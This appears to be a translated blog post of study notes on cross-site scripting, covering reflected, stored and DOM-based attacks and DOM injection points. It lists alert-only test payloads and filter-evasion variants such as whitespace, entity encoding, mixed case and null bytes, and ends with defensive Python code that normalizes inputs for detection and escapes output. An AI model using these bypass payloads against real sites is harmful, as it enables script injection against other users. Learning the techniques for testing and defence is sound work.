XSS (a)

xss

Non-persistent XSS: a non-persistent XSS attack is one-time; it only has an effect at the moment the page is accessed. It requires the user to open a link that the attacker has tampered with; when the user visits that link, the attack script embedded in it executes in the user's browser, which is how the attack achieves its goal.

Persistent XSS: in persistent XSS the attacker's data is stored on the server side, so the attack remains in effect for as long as the attack data exists.

Types: reflected, stored, DOM-based

Common test code:

onmouseover="alert(xss);"

<script>alert(xss);</script>

<a href="javascript:alert(xss);">xss</a>

<img onerror="alert(xss);" src=>

The main principle: close the current tag, then construct the malicious code.

Inputs a user can construct include the search box, the comment section, the registration name, contact information, and so on. Pages also often contain input elements with the hidden attribute; these can be captured with Burp and modified directly. A hidden input cannot be clicked, so different shortcut-key approaches are used to trigger the code in different browsers, and these may conflict with other shortcuts.

accesskey="X" onclick="alert(xss)"

DOM XSS works by changing how the browser parses the page's DOM tree; the malicious code is not returned (echoed) in the page's source code from the server.

Page redirects in JS use location.href, location.replace(), location.assign(); through such a JS jump, a script can be executed via the javascript: pseudo-protocol.

DOM XSS entry points

location: the URL address of the current page
window.name: the name of the current tab. It can be assigned by a different site, which means that if a page assigns window.name and then jumps to another site, the window.name value remains unchanged
document.title: the title of the current page; it can be controlled, for example through input entered in a search box
document.referrer: indicates the origin, i.e. the URL of the page visited before the current one
postMessage: the HTML5 cross-domain messaging mechanism; developers often fail to check the message origin correctly, which leads to DOM XSS
location: usually triggered through a JS jump (redirect), executing a javascript: URI
eval: JavaScript's built-in dynamic code executor
innerHTML: can be assigned to a page element
document.write: can write output into the page's document stream
Function: the function constructor; dynamically passed JS code becomes a callable function
setTimeout: executes JS code after a delay
setInterval: executes JS code repeatedly

XSS bypass via encoding

Sometimes the site filters the input characters; this can then be bypassed with encoding.
Principle: in a URL request, percent signs and other URL-encoded characters are decoded; after the browser receives the page data, HTML entity encoding is decoded; when JS is executed, JS Unicode and other encodings supported by JS are decoded.

URL encoding: % + hexadecimal digits https://www.w3school.com.cn/tags/html_ref_urlencode.html

URL base64 encoding: data:text/html;base64,PHNjcmlwdD5hbGVydCgveHNzLyk7PC9zY3JpcHQ+

HTML encoding: the form '&' + 'entity name' + ';'; there are also '&#' + 'decimal number' + ';' and '&#x' + 'hexadecimal number' + ';'. For the decimal and hexadecimal forms the trailing ; can be omitted.

JS Unicode encoding
The rule is '\u' + 'four hexadecimal digits'
jsfuck https://www.bugku.com/tools/jsfuck/
Insert a space or a tab inside the script tag
<script >alert(1)</script>
<script    >alert(1)</script>

Tab, line feed and carriage return can also be encoded to bypass filters
<script&#9>alert(1)</script>
<script&#10>alert(1)</script>
<script&#13>alert(1)</script>

Change the case of the tag
<ScRipT>alert(1)</sCriPt>

Insert a null byte: inserting a null byte anywhere in the XSS payload can sometimes bypass the filter
<%00script>alert(1)</script>
<script>al%00ert(1)</script>

For IE versions below 10, HTML attributes support backquotes (`), which can be used to close double quotes, thereby bypassing htmlspecialchars().
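To make the "decode in layers" principle and the whitespace/case/null-byte variants above concrete from the defender's side, here is an added Python example (not code from the original post). It uses constructed samples to show that a literal blacklist catches only the plain form, that a check which first applies the three decoding steps named in the text catches every variant, and that entity-encoding on output neutralizes all of them; SAMPLES, naive_blacklist, decode_layers, normalized_detect and render_safely are names chosen for this example.

```python
import html
import re
from urllib.parse import unquote

# Constructed samples: the encoding and whitespace variants listed above.
SAMPLES = [
    "<script>alert(1)</script>",            # plain
    "<script\t>alert(1)</script>",          # tab inside the tag
    "<script&#9>alert(1)</script>",         # tab as an HTML entity, no ';'
    "<ScRipT>alert(1)</sCriPt>",            # mixed case
    "%3Cscript%3Ealert(1)%3C/script%3E",    # URL-encoded
    "<%00script>alert(1)</script>",         # URL-encoded null byte
    "\\u003cscript\\u003ealert(1)",         # JS \uXXXX escapes
]

def naive_blacklist(s: str) -> bool:
    """A literal-match filter: catches only the plain form."""
    return "<script>" in s

def decode_layers(s: str) -> str:
    """Decode in the order the text describes: URL decoding (request),
    then HTML entity decoding (page), then JS \\uXXXX unescaping (script).
    Null bytes are dropped, since lenient parsers ignore them."""
    s = unquote(s).replace("\x00", "")
    s = html.unescape(s)
    return re.sub(r"\\u([0-9a-fA-F]{4})",
                  lambda m: chr(int(m.group(1), 16)), s)

def normalized_detect(s: str) -> bool:
    """Detection: canonicalize first, then match a script tag while
    tolerating whitespace inside the tag and any letter case."""
    return re.search(r"<\s*script[^>]*>", decode_layers(s), re.I) is not None

def render_safely(s: str) -> str:
    """Mitigation for an HTML text context: entity-encode on output
    rather than trying to blacklist inputs."""
    return html.escape(s, quote=True)

def compare(samples=SAMPLES) -> list[tuple[bool, bool]]:
    """Per sample: (naive filter fired, normalized detection fired)."""
    return [(naive_blacklist(s), normalized_detect(s)) for s in samples]

if __name__ == "__main__":
    for s, (naive, norm) in zip(SAMPLES, compare()):
        print(f"{s!r:45} naive={naive!s:5} normalized={norm}")
    print(render_safely(decode_layers(SAMPLES[3])))
```

The decoding order matters: entity-decoding before URL-decoding would miss a payload whose entity was itself percent-encoded, which is the layering the principle above describes.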

Reference Source: https://www.jianshu.com/p/13f0b9a15e46


Origin www.cnblogs.com/GH-D/p/11613986.html